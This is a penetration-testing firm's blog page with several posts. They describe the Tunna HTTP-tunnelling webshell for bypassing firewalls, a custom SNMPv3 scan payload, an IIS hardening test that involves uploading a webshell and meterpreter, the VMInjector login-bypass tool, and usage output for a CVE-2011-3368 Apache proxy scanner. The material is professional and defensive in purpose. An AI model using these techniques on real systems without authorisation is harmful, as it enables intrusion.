SECFORCE          
SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing
   
HOME SECFORCE - penetration testing COMPANY SECFORCE - penetration testing SERVICES SECFORCE - penetration testing RESEARCH SECFORCE - penetration testing BLOG SECFORCE - penetration testing INITIATIVES SECFORCE - penetration testing CONTACT
 
SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing
    SECFORCE - penetration testing

Blog ■

 
SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing
    Home : Blog  
SECFORCE - penetration testing SECFORCE - penetration testing
   
Posts Tagged ‘Penetration Testing’
 

Making Tunna (… or bypassing firewall restrictions with HTTP tunneling)

Friday, August 9th, 2013

A couple of months ago SECFORCE was set to create the ultimate webshell. The idea behind it was to include all the tools a pentester needs in one webshell and make our lifes easier by for example dropping a meterpreter shell on the remote webserver with as less user interaction as possible.

Soon it was apparent that it would be much “cooler” for the webshell to communicate with a meterpreter shell without the need for meterpreter to expose or bind an external port. The benefits of it are obvious – this would effectively bypass any firewall rules in place.

It was realised that this could be a nice tool on its own so the project was forked and development started. Some time later a set of webshells and the client proxies were created. The task was not as easy as it seems, mostly because it is hard to keep it simple and at the same time make the same code work across different languages. Still there are some “programming language” quirks that could not be bypassed or made transparent to the end user. Given the different technologies in play (web servers / web languages / client languages) and all the possible combinations it would be very hard to tackle some of the issues and make it seamless to the end user without loosing some of the tools flexibility. Having said that, Java proved to be the most problematic language of the whole bunch – this needs to be said. Java was eating bytes in large packets – reasons for this are still not obvious – making both debugging and optimisation a pain. Apart from that, the PHP webshell also works in a somehow different way where it stalls a thread on the remote server to keep the connection alive. However, the latter is seamless to the user.

Tunna Framework - Penetration Testing

Tunna Framework - Penetration Testing

What Tunna does is to open a TCP connection (socket) between the webserver (webshell) and a socket on the local machine (webserver). It is also possible to open a connection to any other machine but lets keep this example simple. The client also opens a local socket and starts listening for connections. When a connection is established on the local client any communication would be sent over to the webshell in an HTTP request. The webshell will extract the data and put write them its local socket (remote socket for the client). Now the problem with HTTP is that you cannot really have asynchronous responses. The easiest way to tackle this issue was to keep querying the webshell for data. This creates a lag but it is nothing a pentester cannot live with – at this point it must be noted once more that this is a tool “to get a remote meterpreter shell if the firewall is blocking external connections” and not for critical/real-time applications.

After that, we went back to the original idea and created the metasploit module. It is still under development and should be used with extreme caution. It is still recommended to upload a meterpreter shell and use Tunna main module to connect to it. The metasploit module can be summarised as a “half rewrite of the existing code to work with or around metasploit API” (mostly around). This means that “code hacks” were created as needed to make it work. To be architecturally correct with metasploit, the original idea was to create a new metasploit “handler” … however, this proved to be harder than expected and what you get is a bastardisation of handler-exploit … but it works.

Lastly, any comments, bugs or improvement ideas are welcome.

For more information, visit our Tunna Framework page.

Download: Tunna v0.1

Scanning SNMPv3 with nmap vs unicornscan

Wednesday, June 19th, 2013

Many penetration testers rely on unicornscan’s speed to perform UDP portscans. Sometimes, a first pass is made with unicornscan to detect open UDP ports and then a second pass is made with nmap on those ports to find additional information about the service.

In a recent penetration test we came across an interesting situation where nmap could detect an SNMP service running on the target but unicornscan missed it.

To understand what was happening we wiresharked both scans and compared the packets sent by both scanners.

Wireshark - portscans with unicornscan and nmap

On the left we see the packet sent by unicornscan and on the right the one sent by nmap.

What had happened was that the service running was SNMPv3 and while nmap was sending an SNMPv3 get-request, unicornscan was sending an SNMPv1 get-request which was’t understood/supported by the remote service.

Fortunately, unicornscan is a flexible tool which allows the creation of custom payloads. Creating a payload is as simple as adding the new payload to the configuration file (payloads.conf). By inspecting this file we saw that, as expected, there was an SNMPv1 payload which corresponded exactly to the bytes we saw in wireshark (see selected bytes).

Following this logic, all we had to do was create a payload from the bytes selected in the second capture file. Thus, the new payload looks like this:


/* SNMPv3 payload */
udp 161 161 1 {
"\x30\x3a\x02\x01\x03\x30\x0f\x02\x02\x4a\x69\x02\x03\x00\xff\xe3"
"\x04\x01\x04\x02\x01\x03\x04\x10\x30\x0e\x04\x00\x02\x01\x00\x02"
"\x01\x00\x04\x00\x04\x00\x04\x00\x30\x12\x04\x00\x04\x00\xa0\x0c"
"\x02\x02\x37\xf0\x02\x01\x00\x02\x01\x00\x30\x00"
};

Now, when you run unicornscan it will detect SNMPv3! :)

Is traditional penetration testing effective at identifying risk?

Friday, December 14th, 2012

This September the Director General of GCHQ wrote to many business leaders providing them with a top ten list of priorities for achieving and maintaining a strong resilience to cyber attack.

The challenge for many board members is how to ascertain the validity of what they are being told in relation to the health of their defences. What unknown risks are being carried? There is a high risk of false assurance from internal departments reporting up the chain.

What is the state is your business in when it comes to cyber security?

Ask yourself the following questions;

· How effective are my perimeter defences?

· How much business impact can an anonymous attacker cause on my network?

· What is state of health of my internal systems and networks?

· What level of security awareness is held my staff?

· How effective are my IT and security team are at identifying and mitigating an attack?

If you are sure you know the answer and you are happy with it then you are doing well.

Many of the security assessments we are asked to undertake, although providing value, miss the point when it comes to identifying key risks. The reason is that an advanced and sophisticated attacker would not play by the rules set out in a typical test engagement. If I wanted to attack your organisation, I would carefully target your people, compromise their browsers, infiltrate their laptops or workstations, and from there begin to slowly gain a foothold and control of your network. In my 10 years working at the cutting edge of penetration testing, we have performed this testing but a handful of times; however the majority of successful extrusion attacks would use this method.

There is a miss-match therefore – the skills exist to measure organisations resilience to this form of attack method, the majority of successful breaches would use this technique, but penetration tests typically do not cater for this form of scenario.

A realistic attack would take the form of a discrete engagement to identify and quantify key areas of critical risk – We like to call it offensive security; the best form of defence is to know what the enemy are capable of. If you want to know the truth then you need to test combining the following elements;

· Physical – how easy would it be for an individual to gain access one of your premises/gain access to the network/steal a laptop, PDA device or similar (and attempt to extract the data) Can a remote access device be planted and will this go unnoticed?

· Technical– can your systems be penetrated? How effective are your perimeter and internal controls?

· Social – can your people be easily compromised, what level of control over your systems, data and networks can be achieved?

So to ask the question again – how well equipped are you for fending off an advanced and persistent cyber attack?

Shortcomings of following IIS security best practices

Friday, November 16th, 2012

Having a secure web application is obviously in the best interest of the business. However, in many cases the developing is done without security in mind. Understandably time-to-market is an important factor for a business but a layered security approach will be more beneficial in the long run.

As a preliminary step it is important to secure the perimeter by implementing a firewalled DMZ zone

In short one must follow the configuration below:

Internet—[firewall]—[DMZ Zone]—[firewall]—Internal Network

The benefit of this configuration is that the web server only has limited access to the internal network.

The external firewall should only allow incoming connections on ports 80 and/or 443(https) but this should be done after the web application is ready for deployment. As a first step the external firewall should not allow any connections.

The internal firewall should allow any connection to any service needed and reject any other connections. Additionally it should only allow incoming connections to be made from the internal network and reject outgoing connections to the internal network to be made.

Another obvious benefit of such configuration is that if the web server gets compromised the internal network will be protected and the “attacker” will not be able to use the webserver to compromise hosts on the internal network.

Moreover having a firewall in place from the start it will make it easier to configure access to the web server later on.

As a general rule every exposed service should be seen as a potential threat, as individual vulnerabilities in services can lead to full compromise of the host.

Having said that the setup of a DMZ is not what this blog post is about but it needs to be stated here.

Installing the server:

In the following post we will try to emulate the scenario of an vulnerable web application and how the web server needs to be configured in order be protected against such applications. For this test case an installation of the latest Microsoft Windows 2012 Core server was done. The reason being that no extra services or additional software will be installed.

Soon after the Core installation is finished, we see the Windows Server 2012 login screen.

After successfully authentication, we are greeted with an Administration terminal, and we install IIS by issuing the script below:

C:\>CMD /C START /w PKGMGR.EXE /l:log.etw /iu:IIS-WebServerRole;IIS-WebServer;IIS-CommonHttpFeatures;IIS-StaticContent;IIS-DefaultDocument;IIS-DirectoryBrowsing;IIS-HttpErrors;IIS-HttpRedirect;IIS-ApplicationDevelopment;IIS-ASP;IIS-CGI;IIS-ISAPIExtensions;IIS-ISAPIFilter;IIS-ServerSideIncludes;IIS-HealthAndDiagnostics;IIS-HttpLogging;IIS-LoggingLibraries;IIS-RequestMonitor;IIS-HttpTracing;IIS-CustomLogging;IIS-ODBCLogging;IIS-Security;IIS-BasicAuthentication;IIS-WindowsAuthentication;IIS-DigestAuthentication;IIS-ClientCertificateMappingAuthentication;IIS-IISCertificateMappingAuthentication;IIS-URLAuthorization;IIS-RequestFiltering;IIS-IPSecurity;IIS-Performance;IIS-HttpCompressionStatic;IIS-HttpCompressionDynamic;IIS-WebServerManagementTools;IIS-ManagementScriptingTools;IIS-IIS6ManagementCompatibility;IIS-Metabase;IIS-WMICompatibility;IIS-LegacyScripts;WAS-WindowsActivationService;WAS-ProcessModel;IIS-ASPNET;IIS-NetFxExtensibility;WAS-NetFxEnvironment;WAS-ConfigurationAPI;IIS-ManagementService;MicrosoftWindowsPowerShell;NetFx2-ServerCore;NetFx2-ServerCore-WOW64

The Initial setup was with .NET and without FTP and WebDAV. In retrospect FTP was needed to upload content and it was installed later on. I must note that the PKGMGR is almost apt-get awesome.

After everything is installed we start PowerShell to manage the server more effectively.

In PowerShell we can enable the IIS features that we want eg.:

$IISFeatures = @(“Web-Asp-Net45″, “Web-Net-Ext”, “Web-ISAPI-Ext”, “Web-ISAPI-Filter”, “Web-Filtering”, “Web-IP-Security”)

Add-WindowsFeature -Name $IISfeatures -logPath “$Env:ComputerName.log” –Source \\Server\Share\sources

Soon after the web server is ready and serving …

However default setup is not what we want. Let’s follow best practices for IIS…

As a general rule of thumb default installations are not considered secure or robust in most software. This means that further steps are needed to secure the web server effectively. A search for “IIS best practice standards” gives us an idea of what needs to be done, as summarized below:

  1. Stop Default Web Site
  2. Stop Default application pool
  3. Each site should use its own associated Application Pool
  4. Each site should have Anonymous Authentication configured to use the AppPoolIdentity
  5. Web root directory should be on a separate disk
  6. Move the log files to the separate disk

1. Stopping default website:

In powershell:

load the WebAdministration module

  • PS:\> ipmo WebAdministration

Stop the Default Web Site from Starting on startup

  • PS:\> Set-ItemProperty ‘IIS:\Sites\Default Web Site’ ServerAutoStart False

Stop the Default Web Site

  • PS:\> Stop-WebSite ‘Default Web Site’

*Optionally: remove the Default Web Site

  • PS:\> Remove-WebApplication ‘Default Web Site’

2. Stopping Default application pool:

  • PS:\> Stop-WebAppPool DefaultAppPool

3. Each site should use its own associated Application Pool:

Create new website & changed the default web root

  • PS:\> New-Item IIS:\Sites\Demo -bindings @{protocol=’http';bindingInformation=':80:*’} -PhysicalPath F:\wwwroot\Demo

4. Each site should have Anonymous Authentication configured to use the AppPoolIdentity

  • PS:\> set-webconfigurationproperty /system.webServer/security/authentication/anonymousAuthentication -name userName -value “”
*At this point I must note that using PowerShell was becoming harder and time consuming. So I started IIS remote management to check the configuration more effecively
C:\> net start wmsvc

5. Fix permissions:

Root folder is at f:\wwwroot

Allow inheritance of read permissions in subfolders and files inside this directory

  • F:\>ICACLS <path_to_root> /INHERITANCE:R

Remove users from beeing able to access this directory (Only admins should have full access to the web root folder)

  • F:\>ICACLS <path_to_root> /remove Users

Allow read access to the Application Pool on the Web page folder (f:\wwwroot\Demo)

  • F:\>ICACLS <path_to_site> /grant “IIS AppPool\<app_pool_name>”:(OI)(CI)R
* Another typical case installation scenario would be to give full access to the Application Pool, but this is not suggested:
  • C:\> icacls <path_to_site> /grant “IIS APPPOOL\<app_pool_name>”(CI)(OI)(M)

6. Finally, move the log files to the separate disk

  • PS:\>Set-ItemProperty IIS:\Sites\Demo -name logfile.directory -value F:\weblogs

This concludes the “following best practices” part of the post. Now it is time to test the configuration. I tend to find that exploiting (as I would normally do) is the most effective way of testing. This process involves identifying the issues and then modifying the configuration to combat those issues.

Let’s exploit us !?!

As a first ster an asp web shell was uploadedl. Obviously this is not something to have on your website but we are trying to emulate a vulnerable web application or a web application with vulnerabilities that could allow a web shell to be uploaded.

The web shell allows us to execute commands. This is not something unexpected major after all it’s a web shell. The first issue identified was that we could read other parts of the file system. As expected (due to permissions above) we cannot write to any part of the filesystem or to the websites folder.

Apparently, it is possible to make a new folder at the disk root directory (eg. f:\temp) that gave full permissions to the Application Pool. Following that it was possible to upload a meterpreter exploit and execute it, to get an interactive shell.

The reason behind this was that the default permissions in the hard disk root gave full access to any User. A very simple mistake but had devastating affects for the web server. Moreover changing the permissions of the hard disk root directory was not suggested anywhere in the standards I was following. Additionally, permissions on the %TEMP% folder should also be reviewed as typically this folder can also be accessed by any user.

Lastly I must add that the exploit was running with restricted user permissions. There are a number of techniques for escalating our privileges, but as Windows Server 2012 is new none of the commonly used ones was successful, at least without rebooting the server. In any case the server is considered exploited.

Identifying & fixing the problems:

Problem #1:

AppPool was not restricted inside the wwwroot\Demo folder and had access to other parts of the file system.

To remove user permissions in the root directories.

  • C:\> ICACLS <path_to_drive> /remove Users
  • C:\> ICACLS <path_to_drive> /remove Everyone
* For both F: and C: drives

Problem #2

Executing the exploit.

First, to make it more realistic, lets assume the applications has a legitimate upload functionality it is therefore possible to upload a files to the web server. For this an upload folder with read and write permissions was added.

Although we are able to upload the exploit again, the Application Pool had no execution privileges in that folder so it was not possible to run it.

Problem #3

Although we cannot run an exploit, it is possible to upload a web shell and access it through the web server. This could be possible by abusing the upload functionality of any legitimate web application. To combat this we must instruct the server not to run ASP pages/files from within our upload folder.

To remove the functionality:

make a web.config file with the following content:

<?xml version=”1.0″ encoding=”UTF-8″?>

<configuration>

<system.webServer>

<handlers>

<clear />

</handlers>

</system.webServer>

</configuration>

This instructs the server to clear all the file handlers and to not serve any contents. For example the .asp files will not be handled by the ASP engine.

As we can see below even though the webshell is inside the upload folder when trying to access it we receive a 404 file not found error.

Additionally to prevent overwriting of the file from the webshell, since every object inside the upload folder will inherit IIS AppPool\DemoPool write permissions; the web.config permissions should be changed to:

  • C:\> ICACLS <path>/web.config /inheritance:r /grant:r “IIS APPPOOL\DemoPool”:R Administrators:F

Famous last words:

As per the above examples, following best practices helps the security of the web server but in many cases this can lead to a dangerous false sense of security. Following any post blindly (this included) is not recommended. Continuously testing and modifying the the configuration untill it reaches the desired state (where the whole configuration as restricted as it can be) is generally a better approach, one which help create a truly secure and robust server.

VMInjector – DLL Injection tool to unlock guest VMs

Wednesday, November 14th, 2012

Overview:

VMInjector is a tool designed to bypass OS login authentication screens of major operating systems running on VMware Workstation/Player, by using direct memory manipulation.

Description:

VMInjector is a tool which manipulates the memory of VMware guests in order to bypass the operation system authentication screen.

VMware handles the resources allocated to guest operating systems, including RAM memory. VMInjector injects a DLL library into the VMWare process to gain access to the mapped resources. The DLL library works by parsing memory space owned by the VMware process and locating the memory-mapped RAM file, which corresponds to the guest’s RAM image. By manipulating the allocated RAM file and patching the function in charge of the authentication, an attacker gains unauthorised access to the underlying virtual host.

VMInjector can currently bypass locked Windows, Ubuntu and Mac OS X operation systems.

The in-memory patching is non-persistent, and rebooting the guest virtual machine will restore the normal password functionality.

Attacking Scenarios:

VMInjector can be used if the password of a virtual host is forgotten and requires reset.

Most usually, this tool can be used during penetration testing activities, when access to a VMWare host is achieved and the attacker is looking to gain additional access to the guests running in such host.

Requirements:

  • Windows machine (with administrative access);
  • VMware workstation or player edition;
  • A locked guest VM;

Usage:

VMInjector consists of 2 parts:

  • The DLL injection application (python script or provided converted executable)
  • DLL library (x86 and x64)

The tool supports both x86 and x64 bit architectures by providing both DLLs. One may use his own DLL injector to select the guest virtual machine running on the host.

In order to run the tool, execute the VMInjector (32 or 64) executable provided from the command line as shown in figure 1.

Figure 1: List of running guest machines running.

VMWare runs each guest in a different process. VMInjector needs to be pointed to the process running the guest which requires bypass. Once the user chooses a process, it will inject the DLL into the chosen target.

Once the DLL is injected, the user will need to specify the OS, so that the memory patching can be accomplished, as shown in Figure 2.

Figure 2: Searching for OS signature in memory and patching.

Tool and Source Code:

The tool executable and source code can be found on GitHub (https://github.com/batistam/VMInjector)

Disclaimer:

This tool is for legal purposes only. The code is released under GPLv3 license.

Thanks and references:

I would like to thank Michael Ligh for his valuable research on injecting shellcode into guest virtual machines back in 2006.

I would also like to thank Carsten Maartmann-Moe for is work on Inception, a tool which can unlock locked Windows, Ubuntu and OS X machines by using the IEEE 1394 FireWire trick. This was first showcased by the (now obsolete) winlockpwn tool.

Credits:

Tool coded by Marco Batista

Download:

Please download this tool from GitHub

Holistic penetration testing – when 1 + 1 does not always equal 2

Sunday, October 21st, 2012

Motivated attackers don’t know about “rules of engagement”, narrow scopes of work, “not bruteforing allowed”, etc. Attackers would follow any available path to accomplish their goal, whatever that is. It is not unrealistic to think that a highly motivated attacker would go to great lengths to perform an attack, such as for example compromising a slightly weaker “Application A” to gain access to the DMZ and in turn compromise the real objective “Application B”. Or to test the corporate wireless network in order to gain network access to the internal network…

Although this may seem an obvious statement, many cutting edge companies forget who they are protecting against and what their real outcome for their testing programmes should be.

Nowadays the most common penetration testing requirement is application or system focussed with a defined scope to which penetration testing consultancies need to adhere. This is a natural approach, as dynamic companies very often develop new applications and systems which require security testing before being deployed in production. However, we see a trend among our customers where they complement their normal testing strategy with an annual holistic penetration testing.

A holistic approach would include penetration testing of the infrastructure, physical penetration testing of premises, wireless testing, social engineering attacks and any other angle which is deemed relevant for the specific customer.

Results, of course, differ, but they are always very interesting. The most recurrent discovery is the realisation of the lack of security awareness of the staff, who would handle confidential information such as their username and password when presented with a credible and well delivered phising attack.

The fact that people are the weakest link is very often proven right and inevitably prompts the question whether the investment in defensive security should be somehow split and more resources should be invested in security awareness programmes.

CVE-2011-3368 PoC – Apache Proxy Scanner

Monday, October 10th, 2011

A recent Apache vulnerability has been made public whereby an attacker could gain unauthorised access to content in the DMZ network:

The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.

SECFORCE has developed a proof of concept for this vulnerability, available for download from our security tools section on our website. The script exploits the vulnerability and allows the user to retrieve arbitrary known files from the DMZ. The tool can also be used to perform a port scan of the web server using the Apache proxy functionality, and therefore bypassing any firewall.

The following output shows the usage of the tool:

python apache_proxy_scanner.py
CVE-2011-3368 proof of concept by Rodrigo Marcos

http://www.secforce.co.uk

usage():
python apache_scan.py [options]
 [options]
    -r: Remote Apache host
    -p: Remote Apache port (default is 80)
    -u: URL on the remote web server (default is /)
    -d: Host in the DMZ (default is 127.0.0.1)
    -e: Port in the DMZ (enables 'single port scan')
    -g: GET request to the host in the DMZ (default is /)
    -h: Help page
examples:
 - Port scan of the remote host
    python apache_scan.py -r www.example.com -u /img/test.gif
 - Port scan of a host in the DMZ
    python apache_scan.py -r www.example.com -u /img/test.gif
	-d internalhost.local
- Retrieve a resource from a host in the DMZ
    python apache_scan.py -r www.example.com -u /img/test.gif
	-d internalhost.local -e 80 -g /accounts/index.html

The tool can be used to perform a portscan of the target host in the following way:

python apache_proxy_scanner.py -r <target> -u <uri>

The following screenshot shows the result of the command above:

Apache proxy port scan results

Apache proxy port scan results

The script can be used to perform a bounce scan of a host in the DMZ or in the Internet:

python apache_proxy_scanner.py -r 192.168.85.161
	-u /rewrite/test -d internalhost
python apache_proxy_scanner.py -r 192.168.85.161
	-u /rewrite/test -d www.example.com

Apache_proxy_scanner will report open/filtered/closed ports in internal and external hosts.

SECFORCE is now CREST certified

Monday, July 25th, 2011

As part of the SECFORCE commitment to ensuring the provision of high quality services, SECFORCE has now achieved CREST certification. This will further complement the strong existing methodology and work of ethics.

SECFORCE is already recognised as one of the leading penetration testing service providers in both the UK and Europe with the ability to demonstrate expertise and professionalism to ensure clients are totally satisfied.

CREST Penetration Testing

CREST Penetration Testing

“CREST is a not for profit organisation which brings a demonstrable level of expertise and professionalism to security and penetration testing market. The bar for entry is set very high to protect the interests of the buying community and provide a clear differentiator for professional testing companies. There are very few companies in the UK who can meet the requirements of CREST and those that do, like SECFORCE, have had to demonstrated the processes they utilise for testing are sound, they have adopted industry best practice in their approach to testing and they handle sensitive client information in an appropriate manner.”

Ian Glover, President of CREST

The addition of CREST certification will provide further reassurance and confidence to the many clients where SECFORCE has already built a strong working relationship.

“We are really pleased that CREST certification has been achieved and view this as an important step forward in the continue enhancement of our service delivery”

Rodrigo Marcos, Technical Services Director

For more information about our CREST assessments and discover how we can benefit your organization, please visit our CREST penetration testing page.

GUI manipulation and penetration testing

Friday, July 15th, 2011

Whilst in the web application development world it is becoming very well understood that “you should never trust the data from the client side”, this is not always the case in local applications.

In web environments any restriction enforced at the client side can be easily bypassed with the use of a web proxy. However, security mechanisms enforced in desktop applications sometimes can be manipulated to perform unauthorised actions.

During a recent penetration test we found a desktop application which needed to be assessed in regard to security. GUI manipulation was used to conduct a number of attacks.

The tool of choice for this particular attack was “DARKER’s Enabler“:

Denabler used for GUI manipulation

Denabler used for GUI manipulation

DARKER’s enabler is a tool which allows showing and enabling objects in Windows applications.

The application to be tested had a number of disabled fields that required to be modified for the purpose of the penetration test. Specifically the “Encrypt” checkbox needed to be unchecked, however the application showed the field disabled:

Original application window

Original application window

With Denabler we dragged-and-dropped the red square to the target application in order to identify de Windows handler of the field and then enabled it:

Denabler in action

Denabler in action

The action enabled the field and allowed the penetration testers to disable the encryption in the application, which resulted vital in the outcome of the penetration test:

Window after enabling the fields

Window after enabling the fields

As shown above, GUI manipulation can lead to unwanted consequences. Extra caution needs to be exercised during the planning and development process to minimize the risk of GUI manipulation.

SECFORCE invited to present at Athcon

Saturday, June 18th, 2011

SECFORCE was invited to present at Athcon conference, held in Athens during 2nd and 3rd June 2011.

AthCon is an annual IT security conference that takes place in Athens Greece designed to give a technical insight to the world of IT security. A realistic, practical view of current and evolving threats and security trends presented by top international security experts.

Athcon

SECFORCE presented a talk called “What you didn’t know about Metasploit”, covering the history of the Metasploit Framework, architecture, exploitation and post-exploitation features.

The Metasploit Framework is mainly used for exploitation purposes during penetration testing engagements.

You can download the slides from the talk from our security research area.

 
   
 
BLOG

Archives

November 2014
July 2014
April 2014
March 2014
February 2014
August 2013
June 2013
February 2013
January 2013
December 2012
November 2012
October 2012
January 2012
October 2011
September 2011
July 2011
June 2011
April 2011
February 2011
January 2011
March 2009
February 2009
January 2009
December 2008
November 2008
October 2008

Categories

Aircraft security (1)
Business Continuity (2)
CREST (1)
cyber security (2)
Embedded devices security (2)
exploit (9)
Fuzzing (1)
Penetration Testing (42)
Phishing (3)
Risk Management (5)
SECFORCE (18)
Security architecture (2)
Security Books (1)
Security Compliance (1)
Security research (10)
social engineering (1)
social media (1)
sql injection (3)
SQL Server (3)
Tools (14)
Uncategorized (3)
Vulnerabilities (10)
 
SECFORCE - penetration testing
  SECFORCE - penetration testing Aegon House, 13 Lanark Square
Canary Wharf - E14 9QD, London
SECFORCE - penetration testing Direct Line +44 (0) 845 056 8694
E-mail SECFORCE - penetration testing
  Follow us in Twitter Check us out in LinkedIn SECFORCE is CREST certified. Click on the logo for more information ISO9001 ISO27001
SECFORCE - penetration testing
    Copyright (c) 2014 SECFORCE Ltd · All Rights Reserved